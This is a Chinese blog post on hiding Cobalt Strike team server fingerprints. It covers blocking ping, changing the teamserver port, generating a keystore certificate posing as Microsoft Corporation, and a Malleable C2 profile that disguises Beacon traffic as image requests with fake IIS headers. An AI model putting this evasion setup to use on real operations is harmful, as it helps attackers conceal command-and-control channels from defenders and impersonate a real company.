cs(cobaltstrike)隐藏特征

最新推荐文章于 2024-07-18 16:45:32 发布
最新推荐文章于 2024-07-18 16:45:32 发布
阅读量954 收藏 5
点赞数 2
文章标签: microsoft windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45092459/article/details/126976096
版权

目录

1.禁ping

2. 端口号

3.证书

4.流量混淆

5.CDN

一,禁止ping动作
命令: vim /etc/sysctl.conf #打开文件编辑
添加一行: net.ipv4.icmp_echo_ignore_all = 1
保存刷新: sysctl -p

二,特征端口号更改
编辑: teamserver #直接编辑cs内这个文件,修改host
在这里插入图片描述
三,修改cs默认证书

keytool -keystore keyname.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias test.tk -dname "CN=Microsoft Windows, OU=MOPR, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US"               #创建证书

keytool -importkeystore -srckeystore keyname.store -destkeystore keyname.store -deststoretype pkcs12               #修改证书标准并应用

-keystore 生成的store名
-storepass 指定更改密钥库的存储口令
-keypass 指定更改条目的密钥口令
-keyalg RSA 指定算法
-alias 自定义别名
-dname 指定所有者信息

|:--------😐 -------------😐

使用命令: keytool -list -v -keystore keyname.store 可查看证书内容

在这里插入图片描述
修改teamserver 文件里面的keyname.store,把里面的key文件名和key密码改了。
在这里插入图片描述
然后就可以正常启动了。

四,流量混淆
修改Beacon与cobalt strike通信时候的流量特征,创建一个c2.profile文件(名字任意)。
模板项目地址:https://github.com/threatexpress/malleable-c2

https-certificate {
    set keystore "new-name.store";	#证书名字
    set password "123456";		#证书密码
}
#以上没有配置cloudflare的时候可以先不写

http-get {
    set uri "/image/";
    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8";
        header "Referer" "http://www.google.com";
        header "Host" "apex1.tk";  #域名,还没有配置cloudflare的时候这一行注释掉
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        metadata {
            netbios;
            append ".jpg";  # 传输内容自动追加的后缀
            uri-append;
        }
    }

    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;  # 加密方式(base64、base64url、netbios、netbiosu)
            print;
        }
    }
}

http-post {
    set uri "/email/";
    client {
        header "Content-Type" "application/octet-stream";
        header "Referer" "http://www.google.com"; 
        header "Host" "apex1.tk";  #域名,还没有配置cloudflare的时候这一行注释掉
        header "Pragma" "no-cache";
        header "Cache-Control" "no-cache";
        id {
            netbiosu;
            append ".png";
            uri-append;
        }
        output {
            base64;
            print;
        }
    }
    server {
        header "Content-Type" "img/jpg";
        header "Server" "Microsoft-IIS/6.0";
        header "X-Powered-By" "ASP.NET";
        output {
            base64;
            print;
        }
    }
}
qq_45092459
关注
CS-隐藏防朔源-数据转发-中间件反向代理-Apache
金灰的博客
06-27 629
实战情况下还是要准备两台外网服务器.--还是做个中转。
Cobaltstrike去除特征
Ms08067安全实验室
12-02 6147
本文作者:BlackCat(Ms08067实验室内网小组成员)前言:红蓝对抗的时候,如果未修改CS特征、容易被蓝队溯源。去特征的几种方法:1、更改默认端口方法一、直接编辑teamser...
cs流量特征隐藏
renyizou的博客
11-16 1624
转载mark一下 https://xz.aliyun.com/t/9542https://xz.aliyun.com/t/9542
内网神器Cobalt Strike隐藏特征与流量混淆.
2301_80115097的博客
04-30 834
由于上次还没有写好https上线的东西,今天加班加点的弄出来了。本文内容如有错误,望及时告知,以免误导他人.
CobaltStrike特征隐藏合法证书SSL加密通讯
做自己喜欢的事,并将其发挥到极致!
11-16 2338
0x01 CobaltStrike介绍 在红蓝对抗、实战攻防项目中,防守方(蓝队)一般会有许多厂商的安全监控设备,因此,为了防止被蓝队溯源需要采取一些措施去修改CobaltStrike工具特征,CobaltStrike服务端与客户端使用SSL加密通讯的(默认证书CobaltStrike.store),默认情况下的一些配置文件导致keystore文件的内容被用于安全设备所识别、敏感特征识别等,所以该如何修改不易被蓝方发现是至关重要的! 0x02 修改特征的几种方法 1.更改默认端口 方法一: 赋予 teams
CobaltStrike服务端自身隐匿技巧
The current road is different, love needs to distinguish between right and wrong
11-18 2376
CobaltStrike服务端自身隐匿技巧
CobaltStrike五大插件带你起飞:巨龙拉冬、LSTR、欧拉、梼杌、谢公子的插件
06-24
Cobalt Strike是一款广泛应用于渗透测试和红队操作的高级框架,它提供了多种攻击向量,使得安全专家能够模拟黑客行为来评估网络安全。在标题和描述中提到的“五大插件”是Cobalt Strike中增强其功能的重要扩展,它们...
Cobalt_Strike_C2隐匿多级nginx反向代理1
08-03
Cobalt Strike 是一种广泛使用的红队工具,它提供了多种功能,包括建立 C2 通道、执行命令、收集信息等。在本文中,我们将讨论如何利用多级 Nginx 反向代理来隐藏 C2 通信,提高隐蔽性。 首先,我们要了解 Nginx ...
cobaltstrike3.6
04-15
Cobalt Strike 3.6 是一款备受瞩目的渗透测试工具,专为网络安全专业人士设计,用以模拟黑客攻击,评估组织的安全防御能力。这个版本在业内被誉为“CS神器”,不仅因为其强大的功能,还因为其易用性和灵活性。Cobalt...
反击CobaltStrike
HBohan的博客
09-03 1368
背景 CobaltStrike(简称CS)作为一款渗透测试神器,采用C/S架构,可进行分布式团队协作。CS集成了端口转发、服务扫描、自动化溢出、多模式端口监听、Windows exe与dll 木马生、Java 木马生成、Office 宏病毒生成、木马捆绑等强大功能,深受广大红队同学的喜爱。为了规避侦测,红队往往会对CS采用一些隐匿手段,常见方式有云函数和CDN等。这些隐匿手段隐匿了CS的真实IP,诸如DDoS之类的流量无法穿透CDN到达CS,常规的攻击方式难以对CS服务器形成有效干扰和打击。只能止步于此了吗
如何启用CobaltStrike隐藏的Sleep_mask功能
最新发布
yellow的博客
07-18 224
CobatStrike的信标从4.5版本开始支持Sleep_mask功能;从4.5-4.8版本生成反射加载dll信标都会文明包含sleep_mask()函数,无论是否启用sleep_mask功能;而4.9版本不会文明包含sleep_mask()函数,只有在启用sleep_mask功能时,才会把sleep_mask()函数解密到一个单独的内存段中。
CobaltStrike去除特征
2301_76786857的博客
02-18 180
svchost.exe是微软Windows操作系统中的系统文件,微软官方对它的解释是:svchost.exe 是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。这里面的id代表的是task id,任务执行后,beacon需要利用post方式来与c2进行通信,需要传送一个唯一的task id值,还需要传送回显。现在的大多数硬件WAF防护设备都能检测出来Cs的流量特征,所以我们必须要修改CS的流量特征CS的流量由malleable C2配置来掌控的,所以我们需要定向去配置这个C2。
cobaltstrike去除特征
技术超强的网络安全平台
09-22 120
cobaltstrike去除特征 SSL证书设置 : 此设置控制用于HTTPS通信的SSL证书。如果可能的话,请为你正在使用的域使用真实的,正确发布的SSL证书。LetsEncrypt可以发布所有主要操作系统和浏览器都信任的免费SSL证书,并且会让防御者更难以检查Beacon流量。 生成SSL证书命令 keytool -genkey -alias tenet -keyalg RSA -validity 36500 -keystore tenet.store tenet tenet.store这两个字符串要记
阿一网络安全学院课代表教你如何快速隐藏CS
qq_69775412的博客
05-31 770
原版的CobaltStrike存在某些未授权访问漏洞,以及特征太过于明显,以至于很容易被C2检测器发现。本文记录了一些隐藏特征的方法,这些方法不涉及更改cs底层jar文件,适合小白(指自己)快速部署。本文目标:从流量、端口、访问页面等方面尽可能隐藏cs流量,运用cdn实现IP隐匿,同时实现linuxC2通讯功能。
Cobaltstrike去除流量特征
chaojixiaojingang
08-02 2418
普通CS没有做流量混淆会被防火墙拦住流量,所以偶尔会看到CS上线了机器但是进行任何操作都没有反应,这里尝试一下做流量混淆。参考网上的文章,大部分是两种方法,一种更改teamserver 里面与CS流量相关的内容,一种是利用Keytool工具生成新的store证书,我们需要做的修改大概为3个地方: 1)修改默认端口 2)去除store证书特征 3)修改profile 1.修改默认端口 编辑teamserver文件,更改server po...
CobaltStrike 流量隐藏
qq_43615820的博客
06-26 1066
cobalt strike 特征隐藏
使用Heroku进行CS流量隐蔽
Shanfenglan's blog
04-20 656
准备工作 注册heroku账号,必须使用Gmail账号。 注册网址:https://dashboard.heroku.com/ 配置 1.注册成功后进行登录,访问以下网址进入配置页面。 https://dashboard.heroku.com/new?template=https://github.com/FunnyWolf/nginx-proxy-heroku 2.点击Deploy app,有如下显示的时候即配置成功: 3.配置两个监听器: 第一个,域名为vps域名,端口为之前配置的需要被代理的端
Cobaltstrike上线流量隐藏
weixin_51151498的博客
05-10 852
Cobaltstrike上线流量隐藏
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值